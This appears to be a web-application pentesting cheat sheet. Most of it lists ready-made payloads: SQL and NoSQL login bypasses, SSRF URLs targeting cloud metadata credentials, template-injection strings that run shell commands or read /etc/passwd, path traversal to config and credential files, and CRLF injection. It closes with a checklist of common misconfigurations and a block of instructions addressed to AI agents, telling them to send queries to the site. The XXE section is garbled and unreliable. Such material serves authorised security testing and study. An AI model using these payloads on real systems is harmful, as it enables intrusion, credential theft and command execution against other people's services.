click here
```
### SQL Injection Payloads
```sql
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
' OR '1'='1' //
' OR '1'='1' #
admin' --
admin' /*
admin' //
admin' #
' OR 1=1
' OR 1=1 --
' OR 1=1 /*
' OR 1=1 //
' OR 1=1 #
' OR 'a'='a
' OR 'a'='a' --
' OR 'a'='a' /*
' OR 'a'='a' //
' OR 'a'='a' #
```
### NoSQL Injection Payloads
```json
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": "admin", "password": {"$ne": null}}
{"username": "admin", "password": {"$gt": ""}}
{"username": "admin", "password": {"$in": [""]}}
{"username": "admin", "password": {"$where": "this.password.length > 0"}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}, "password": {"$ne": null}}
{"username": {"$eq": "admin"}, "password": {"$ne": "admin"}}
{"username": {"$ne": "admin"}, "password": {"$exists": true}}
{"username": {"$in": ["admin", "user"]}, "password": {"$ne": "password"}}
```
### SSRF Payloads
```http
# Retrieve AWS Metadata
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/network/interfaces/macs/
http://127.0.0.1:80
http://127.0.0.1:8080
http://localhost:80
http://localhost:8080
http://0.0.0.0:80
http://0.0.0.0:8080
http://[::]:80
http://[::]:8080
http://[::1]:80
http://[::1]:8080
http://internal-service:80
http://internal-service:8080
```
### XXE Payloads
```xml
xmlCopy code ]>&xxe;
]>&xxe;
]>&xxe;
]>&xxe;
]>&xxe;
]>&xxe;
]>&xxe;
]>&xxe;
]>&xxe;
]>&xxe;
```
### SSTI Payloads
```jinja
# jinja
{{7*7}}
{{7*'7'}}
{{7*'7'.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{config.items()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{request['application']['__globals__']['__builtins__']['__import__']('os').popen('id').read()}}
{% for c in [].__class__.__base__.__subclasses__() %}
{{c}}
{% endfor %}
{{''.__class__.mro()[1].__subclasses__()[40].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()}}
{{config['SECRET_KEY'].__class__.__mro__[2].__subclasses__()[40]('id').read()}}
{{request.application.__globals__.__builtins__.open('index.html').read()}}
```
### File Inclusion Payloads
```php
../../../../../../etc/passwd
../../../../../../boot.ini
../../../../../../windows/win.ini
../../../../../../winnt/win.ini
../../../../../../windows/system.ini
../../../../../../windows/system32/drivers/etc/hosts
../../../../../../winnt/system32/drivers/etc/hosts
../../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../usr/local/apache/logs/access.log
../../../../../../usr/local/apache/logs/error.log
../../../../../../var/www/html/index.php
../../../../../../var/www/html/wp-config.php
../../../../../../usr/local/etc/php.ini
../../../../../../etc/httpd/conf/httpd.conf
../../../../../../etc/mysql/my.cnf
```
### CRLF Injection Payloads
GET / HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n
GET /index.html HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
POST /submit HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n
GET / HTTP/1.1\r\nHost: example.com\r\nSet-Cookie: injected-cookie=value\r\n
POST /login HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
GET /search?q=test HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
POST /upload HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n
GET /download HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
POST /create HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n
GET /api/v1/data HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
## Easy Vulnerabilities & Security Misconfigurations to Report
Vulnerabilities that could be found in the early stages (first few hours) of a pentest.
### Security Headers
* **Misconfigured Security Headers:**
* X-Frame-Options
* X-XSS-Protection
* X-Content-Type-Options
* Strict-Transport-Security
* Content-Security-Policy (CSP)
* Referrer-Policy
### Cross-Origin Resource Sharing (CORS)
* **Insecure CORS Configuration:**
* Allowing wildcard (\*) origin
* Allowing untrusted origins
* Lack of proper validation
### Cookie Attributes
* **Insecure Cookie Attributes:**
* Missing HttpOnly flag
* Missing Secure flag
* Missing SameSite attribute
### Authentication & Session Management
* **Concurrent Logins Allowed:**
* Multiple sessions from different IPs
* **Improper Session Timeout:**
* Long or no session expiration
* **Improper Invalidation of Cookie Post Logout:**
* Session remains active after logout
* **Weak Password Policies:**
* No complexity requirements
* Lack of rate limiting
### File Handling
* **Unrestricted File Upload:**
* No file type validation
* No file size restrictions
* No scanning for malware
### Access Controls
* **Staging Environment Accessible from External Network:**
* Exposed internal environments
* **Sensitive Directories Accessible:**
* /.git/, /.svn/, /backup/, /config/
### Web Server Configuration
* **Clickjacking:**
* Missing X-Frame-Options header
* **Weak SSL Ciphers:**
* Use of deprecated SSL/TLS versions
* Weak cipher suites enabled
* **Web Server Fingerprinting:**
* Banner Grabbing revealing server information
### Information Disclosure
* **Verbose Error Messages:**
* Detailed stack traces
* Application/Server details in error messages
* **Directory Listing Enabled:**
* Ability to list files in web directories
### Business Logic & Other Issues
* **Lack of Rate Limiting:**
* Brute force or DoS vulnerabilities
* **No Account Lockout:**
* Unlimited login attempts
* **Weak Default Credentials:**
* Use of default passwords for admin accounts
* **HTTP Methods:**
* TRACE/TRACK methods enabled
* **Referrer Policy:**
* No Referrer Policy header
* **API Security:**
* Lack of authentication
* Lack of rate limiting
* Exposed sensitive endpoints
* **Insecure Direct Object References (IDOR):**
* Direct access to unauthorized resources
* **Lack of Input Validation:**
* No sanitization of user input
### Additional Points
* **Backup Files Accessible:**
* .bak, .old, .save files accessible
* **Exposed API Keys or Tokens:**
* API keys or tokens in URLs, JavaScript, etc.
* **Insufficient Logging and Monitoring:**
* Lack of logging for security events
* **Cross-Site Request Forgery (CSRF):**
* Missing or incorrect CSRF tokens
* **Insufficient Transport Layer Security:**
* HTTP instead of HTTPS
* **Autocomplete Enabled for Sensitive Fields:**
* Sensitive form fields have autocomplete enabled
* **Insecure Directories:**
* /admin/, /config/, /backup/ directories exposed
* **Insecure Third-Party Integrations:**
* Unpatched or outdated third-party libraries and frameworks
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://playbook.sidthoviti.com/web-app-pentesting/handy-commands-and-payloads.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.